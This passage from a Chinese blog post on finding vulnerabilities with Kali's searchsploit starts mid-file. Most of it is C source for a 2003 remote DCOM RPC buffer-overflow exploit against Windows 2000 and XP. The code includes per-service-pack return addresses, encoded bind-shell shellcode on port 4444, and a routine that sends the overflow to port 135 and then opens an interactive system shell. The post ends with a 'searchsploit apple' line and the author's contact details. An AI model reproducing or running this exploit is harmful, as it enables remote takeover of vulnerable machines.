,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00};  unsigned char request2[]={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x5C,0x00,0x5C,0x00};  unsigned char request3[]={ 0x5C,0x00 ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};    unsigned char *targets [] =         {             "Windows 2000 SP0 (english)",             "Windows 2000 SP1 (english)",             "Windows 2000 SP2 (english)",             "Windows 2000 SP3 (english)",             "Windows 2000 SP4 (english)",             "Windows XP SP0 (english)",             "Windows XP SP1 (english)",              NULL                                                                                                };          unsigned long offsets [] =          {             0x77e81674,              0x77e829ec,              0x77e824b5,              0x77e8367a,              0x77f92a9b,              0x77e9afe3,             0x77e626ba,         };  unsigned char sc[]=     "/x46/x00/x58/x00/x4E/x00/x42/x00/x46/x00/x58/x00"     "/x46/x00/x58/x00/x4E/x00/x42/x00/x46/x00/x58/x00/x46/x00/x58/x00"     "/x46/x00/x58/x00/x46/x00/x58/x00"      "/xff/xff/xff/xff" /* return address */          "/xcc/xe0/xfd/x7f" /* primary thread data block */     "/xcc/xe0/xfd/x7f" /* primary thread data block */      /* port 4444 bindshell */     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"     "/x90/x90/x90/x90/x90/x90/x90/xeb/x19/x5e/x31/xc9/x81/xe9/x89/xff"     "/xff/xff/x81/x36/x80/xbf/x32/x94/x81/xee/xfc/xff/xff/xff/xe2/xf2"     "/xeb/x05/xe8/xe2/xff/xff/xff/x03/x53/x06/x1f/x74/x57/x75/x95/x80"     "/xbf/xbb/x92/x7f/x89/x5a/x1a/xce/xb1/xde/x7c/xe1/xbe/x32/x94/x09"     "/xf9/x3a/x6b/xb6/xd7/x9f/x4d/x85/x71/xda/xc6/x81/xbf/x32/x1d/xc6"     "/xb3/x5a/xf8/xec/xbf/x32/xfc/xb3/x8d/x1c/xf0/xe8/xc8/x41/xa6/xdf"     "/xeb/xcd/xc2/x88/x36/x74/x90/x7f/x89/x5a/xe6/x7e/x0c/x24/x7c/xad"     "/xbe/x32/x94/x09/xf9/x22/x6b/xb6/xd7/x4c/x4c/x62/xcc/xda/x8a/x81"     "/xbf/x32/x1d/xc6/xab/xcd/xe2/x84/xd7/xf9/x79/x7c/x84/xda/x9a/x81"     "/xbf/x32/x1d/xc6/xa7/xcd/xe2/x84/xd7/xeb/x9d/x75/x12/xda/x6a/x80"     "/xbf/x32/x1d/xc6/xa3/xcd/xe2/x84/xd7/x96/x8e/xf0/x78/xda/x7a/x80"     "/xbf/x32/x1d/xc6/x9f/xcd/xe2/x84/xd7/x96/x39/xae/x56/xda/x4a/x80"     "/xbf/x32/x1d/xc6/x9b/xcd/xe2/x84/xd7/xd7/xdd/x06/xf6/xda/x5a/x80"     "/xbf/x32/x1d/xc6/x97/xcd/xe2/x84/xd7/xd5/xed/x46/xc6/xda/x2a/x80"     "/xbf/x32/x1d/xc6/x93/x01/x6b/x01/x53/xa2/x95/x80/xbf/x66/xfc/x81"     "/xbe/x32/x94/x7f/xe9/x2a/xc4/xd0/xef/x62/xd4/xd0/xff/x62/x6b/xd6"     "/xa3/xb9/x4c/xd7/xe8/x5a/x96/x80/xae/x6e/x1f/x4c/xd5/x24/xc5/xd3"     "/x40/x64/xb4/xd7/xec/xcd/xc2/xa4/xe8/x63/xc7/x7f/xe9/x1a/x1f/x50"     "/xd7/x57/xec/xe5/xbf/x5a/xf7/xed/xdb/x1c/x1d/xe6/x8f/xb1/x78/xd4"     "/x32/x0e/xb0/xb3/x7f/x01/x5d/x03/x7e/x27/x3f/x62/x42/xf4/xd0/xa4"     "/xaf/x76/x6a/xc4/x9b/x0f/x1d/xd4/x9b/x7a/x1d/xd4/x9b/x7e/x1d/xd4"     "/x9b/x62/x19/xc4/x9b/x22/xc0/xd0/xee/x63/xc5/xea/xbe/x63/xc5/x7f"     "/xc9/x02/xc5/x7f/xe9/x22/x1f/x4c/xd5/xcd/x6b/xb1/x40/x64/x98/x0b"     "/x77/x65/x6b/xd6/x93/xcd/xc2/x94/xea/x64/xf0/x21/x8f/x32/x94/x80"     "/x3a/xf2/xec/x8c/x34/x72/x98/x0b/xcf/x2e/x39/x0b/xd7/x3a/x7f/x89"     "/x34/x72/xa0/x0b/x17/x8a/x94/x80/xbf/xb9/x51/xde/xe2/xf0/x90/x80"     "/xec/x67/xc2/xd7/x34/x5e/xb0/x98/x34/x77/xa8/x0b/xeb/x37/xec/x83"     "/x6a/xb9/xde/x98/x34/x68/xb4/x83/x62/xd1/xa6/xc9/x34/x06/x1f/x83"     "/x4a/x01/x6b/x7c/x8c/xf2/x38/xba/x7b/x46/x93/x41/x70/x3f/x97/x78"     "/x54/xc0/xaf/xfc/x9b/x26/xe1/x61/x34/x68/xb0/x83/x62/x54/x1f/x8c"     "/xf4/xb9/xce/x9c/xbc/xef/x1f/x84/x34/x31/x51/x6b/xbd/x01/x54/x0b"     "/x6a/x6d/xca/xdd/xe4/xf0/x90/x80/x2f/xa2/x04";       unsigned char request4[]={ 0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };   /* ripped from TESO code */ void shell (int sock) {         int     l;         char    buf[512];         fd_set  rfds;           while (1) {                 FD_SET (0, &rfds);                 FD_SET (sock, &rfds);                  select (sock + 1, &rfds, NULL, NULL, NULL);                 if (FD_ISSET (0, &rfds)) {                         l = read (0, buf, sizeof (buf));                         if (l <= 0) {                                 printf("/n - Connection closed by local user/n");                                 exit (EXIT_FAILURE);                         }                         write (sock, buf, l);                 }                  if (FD_ISSET (sock, &rfds)) {                         l = read (sock, buf, sizeof (buf));                         if (l == 0) {                                 printf ("/n - Connection closed by remote host./n");                                 exit (EXIT_FAILURE);                         } else if (l < 0) {                                 printf ("/n - Read failure/n");                                 exit (EXIT_FAILURE);                         }                         write (1, buf, l);                 }         } }   int main(int argc, char **argv) {          int sock;     int len,len1;     unsigned int target_id;     unsigned long ret;     struct sockaddr_in target_ip;     unsigned short port = 135;     unsigned char buf1[0x1000];     unsigned char buf2[0x1000];      printf("---------------------------------------------------------/n");     printf("- Remote DCOM RPC Buffer Overflow Exploit/n");     printf("- Original code by FlashSky and Benjurry/n");     printf("- Rewritten by HDM <hdm [at] metasploit.com>/n");       if(argc<3)     {         printf("- Usage: %s <Target ID> <Target IP>/n", argv[0]);         printf("- Targets:/n");         for (len=0; targets[len] != NULL; len++)         {             printf("-          %d/t%s/n", len, targets[len]);            }         printf("/n");         exit(1);     }       /* yeah, get over it :) */     target_id = atoi(argv[1]);     ret = offsets[target_id];          printf("- Using return address of 0x%.8x/n", ret);      memcpy(sc+36, (unsigned char *) &ret, 4);      target_ip.sin_family = AF_INET;     target_ip.sin_addr.s_addr = inet_addr(argv[2]);     target_ip.sin_port = htons(port);      if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)     {         perror("- Socket");         return(0);     }          if(connect(sock,(struct sockaddr *)⌖_ip, sizeof(target_ip)) != 0)     {         perror("- Connect");         return(0);     }          len=sizeof(sc);     memcpy(buf2,request1,sizeof(request1));     len1=sizeof(request1);          *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;       *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;          memcpy(buf2+len1,request2,sizeof(request2));     len1=len1+sizeof(request2);     memcpy(buf2+len1,sc,sizeof(sc));     len1=len1+sizeof(sc);     memcpy(buf2+len1,request3,sizeof(request3));     len1=len1+sizeof(request3);     memcpy(buf2+len1,request4,sizeof(request4));     len1=len1+sizeof(request4);          *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;           *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;       *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;     *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;     *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;     *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;     *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;     *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;          if (send(sock,bindstr,sizeof(bindstr),0)== -1)     {             perror("- Send");             return(0);     }     len=recv(sock, buf1, 1000, 0);          if (send(sock,buf2,len1,0)== -1)     {             perror("- Send");             return(0);     }     close(sock);     sleep(1);          target_ip.sin_family = AF_INET;     target_ip.sin_addr.s_addr = inet_addr(argv[2]);     target_ip.sin_port = htons(4444);      if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)     {         perror("- Socket");         return(0);     }          if(connect(sock,(struct sockaddr *)⌖_ip, sizeof(target_ip)) != 0)     {         printf("- Exploit appeared to have failed./n");         return(0);     }            printf("- Dropping to System Shell.../n/n");      shell(sock);          return(0); }  // milw0rm.com [2003-07-26]  View Code

查找apple的漏洞

 searchsploit apple 

如何使用kali的Searchsploit查找软件漏洞

作者: NONO

出处: http://www.cnblogs.com/diligenceday/

QQ: 287101329

微信:

18101055830

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: